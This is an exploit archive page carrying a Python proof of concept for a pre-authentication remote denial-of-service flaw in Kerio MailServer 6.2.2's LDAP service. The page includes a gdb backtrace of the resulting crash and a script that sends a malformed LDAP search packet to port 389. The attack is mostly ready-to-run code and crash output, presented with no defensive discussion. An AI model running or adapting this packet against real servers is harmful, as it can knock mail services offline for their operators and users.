首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Kerio MailServer 6.2.2 preauth Remote Denial of Service PoC
来源:vfocus.net 作者:Evgeny 发布时间:2006-12-15  

#!/usr/bin/env python
# kms1.py - Kerio MailServer 6.2.2 preauth remote DoS
# fixed in Kerio MailServer 6.3.1
#
# Copyright (c) 2006 Evgeny Legerov
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.


"""
gdb backtrace:
# gdb -q ./mailserver core.18450
(no debugging symbols found)
Using host libthread_db library "/lib/libthread_db.so.1".
Reading symbols from shared object read from target memory...(no debugging
symbols found)...done.
Loaded system supplied DSO at 0xb76000
Core was generated by `/opt/kerio/mailserver/mailserver /opt/kerio/mailserver'.
Program terminated with signal 11, Segmentation fault.
...
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x0821c444 in LDAPSearchRequest::parsePagedResults ()
(gdb) bt
#0 0x0821c444 in LDAPSearchRequest::parsePagedResults ()
#1 0x0821c387 in LDAPSearchRequest::setAll ()
#2 0x08093d8a in Ber::getSearchRequest ()
#3 0x08205e48 in LDAPServer::search ()
#4 0x08207de0 in LDAPServer::server ()
#5 0x08207e2e in ldap_handler ()
#6 0x0841be13 in KServerTask::handler ()
#7 0x082033c6 in KThreadPool::workerThread ()
#8 0x086ee7b6 in kerio::tiny::thread ()
#9 0x00772b80 in start_thread () from /lib/libpthread.so.0
#10 0x00558dee in clone () from /lib/libc.so.6
(gdb) x/i $eip
0x821c444 <_ZN17LDAPSearchRequest17parsePagedResultsE13LDAPExtension+12>:
mov (%eax),%edx
(gdb) i r eax
eax 0x449 1097
"""

from socket import *

host = "localhost"
port = 389

s = "\x30\x82\x04\x4d\x02\x01\x26\x63\x82\x04\x46\x04\x00\x0a\x01\x02"
s += "\x0a\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0b\x6f\x62"
s += "\x6a\x65\x63\x74\x43\x6c\x61\x73\x73\x30\x02\x04\x00\xa0\x82\x04"
s += "\x20\x30\x82\x04\x1c"
s += "\x01"*1024
s += "\x16\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x31"
s += "\x33\x35\x35\x36\x2e\x31\x2e\x34\x2e\x34\x37\x33\x01\x01\x00\x04"
s += "\x00"

sock = socket(AF_INET, SOCK_STREAM)
sock.connect((host,port))
sock.sendall(s)
sock.recv(10000)
sock.close()



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·yaplap <= 0.6.1b (ldap.php)
·OpenLDAP <= 2.4.3 (KBIND) R
·MS Internet Explorer 7 (DLL-lo
·Sambar FTP Server 6.4 (SIZE) R
·ProFTPD <= 1.3.0a (mod_ctrl
·Windows Media Player 9/10 (MID
·Crob FTP Server 3.6.1 build 26
·GNU InetUtils ftpd 1.4.2 (ld.s
·mxBB Module newssuite 1.5 Rem
·extreme-fusion <= 4.02 Remo
·D-Link DWL-2000AP 2.11 (ARP Fl
·Star FTP Server 1.10 (RETR) Re
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved